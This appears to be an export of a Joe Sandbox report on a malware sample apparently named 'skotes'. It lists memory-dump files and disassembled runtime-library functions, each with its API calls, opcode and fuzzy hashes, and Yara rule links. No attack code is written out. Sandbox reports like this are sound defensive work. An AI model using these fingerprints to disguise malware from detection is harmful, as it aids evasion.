Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: c90ae3db66b5619743134332522a0b96de832b73a835be1452314c5289bd2e52
Instruction ID: ae653f2904145b69ab52663abb2b4fb7e3edd65935fe92c1210b3776c40d0dfd
Opcode Fuzzy Hash: c90ae3db66b5619743134332522a0b96de832b73a835be1452314c5289bd2e52
Instruction Fuzzy Hash: 67B145329402959FDB11DF28C8D17EEBBE5EF46340F1441AAF855EB241D6349E82EBA0

Function 00C267A9 Relevance: 6.2, APIs: 4, Instructions: 245COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00C26902
__alloca_probe_16.LIBCMT ref: 00C26998
__freea.LIBCMT ref: 00C26A03
__freea.LIBCMT ref: 00C26A0F

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: __alloca_probe_16__freea
String ID:
API String ID: 1635606685-0
Opcode ID: 5d58fa7ce929fae245f7d05b5c9c5b2285effc267a29335a489f843fe9b419d8
Instruction ID: c9cc240148f5b2e9dfafc7ec31adb1efd25856dff3bab1fdf664ec1bdb91063b
Opcode Fuzzy Hash: 5d58fa7ce929fae245f7d05b5c9c5b2285effc267a29335a489f843fe9b419d8
Instruction Fuzzy Hash: 2B81E572D0026A9BDF209F65A881EEF7BB5EF09314F184055E864B7681EB31CD44EBB0

Function 00C1504E Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00C15115
___AdjustPointer.LIBCMT ref: 00C15138
___AdjustPointer.LIBCMT ref: 00C151D4

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: db00f749c989db083072d8c9360b3c405d116fe1bf0f381c0dbbf7437b626f4d
Instruction ID: 0987d38b83c156293d6b3d28be812a21e9a6c46dfe087489d4a6781fbf6608ac
Opcode Fuzzy Hash: db00f749c989db083072d8c9360b3c405d116fe1bf0f381c0dbbf7437b626f4d
Instruction Fuzzy Hash: F951E172A01A05EFDB268F54D841BFE73B5EF96300F244529E81147290E771AED1F790

Function 00C14C15 Relevance: 6.1, APIs: 4, Instructions: 141COMMON

Download Yara Rule

APIs

TypeidsEqual.LIBVCRUNTIME ref: 00C14C66
TypeidsEqual.LIBVCRUNTIME ref: 00C14C8B
PMDtoOffset.LIBCMT ref: 00C14CA1
PMDtoOffset.LIBCMT ref: 00C14D22

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: EqualOffsetTypeids
String ID:
API String ID: 1707706676-0
Opcode ID: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
Instruction ID: 8b8273392fd68035d939c1b7105fd3db2ffbf958a22d48ab6cf292db20569dff
Opcode Fuzzy Hash: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
Instruction Fuzzy Hash: C151DD75E0420A8FCF18DF68D4806EEBBF5EF06314F14448AE860A7350C732AE85EB90

Function 00BE2EC0 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00BE2F5F
GetCurrentThreadId.KERNEL32 ref: 00BE2F7E
__Mtx_unlock.LIBCPMT ref: 00BE2FCC
__Cnd_broadcast.LIBCPMT ref: 00BE2FE3

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcastCurrentThread
String ID:
API String ID: 3264154886-0
Opcode ID: 4c00cb92a7d00ee8c6104d894a17f866d31dc60e67713e03bb6e5708a545d0cb
Instruction ID: e4c7d4e8b6e22792d80ccb2a2d57bc2fa8c915390984253bc0416833c40889e7
Opcode Fuzzy Hash: 4c00cb92a7d00ee8c6104d894a17f866d31dc60e67713e03bb6e5708a545d0cb
Instruction Fuzzy Hash: 7441E3B0901209AFDB20DF65C944B6ABBF8FF14720F0045A9E916D7781EB35EA08CBC1

Function 00C0DB30 Relevance: 6.1, APIs: 4, Instructions: 123COMMON

Download Yara Rule

APIs

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00C0DB64

Part of subcall function 00C08F2F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00C08F50

Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00C0DBC3
Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00C0DBE9
Concurrency::location::_Assign.LIBCMT ref: 00C0DC56

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
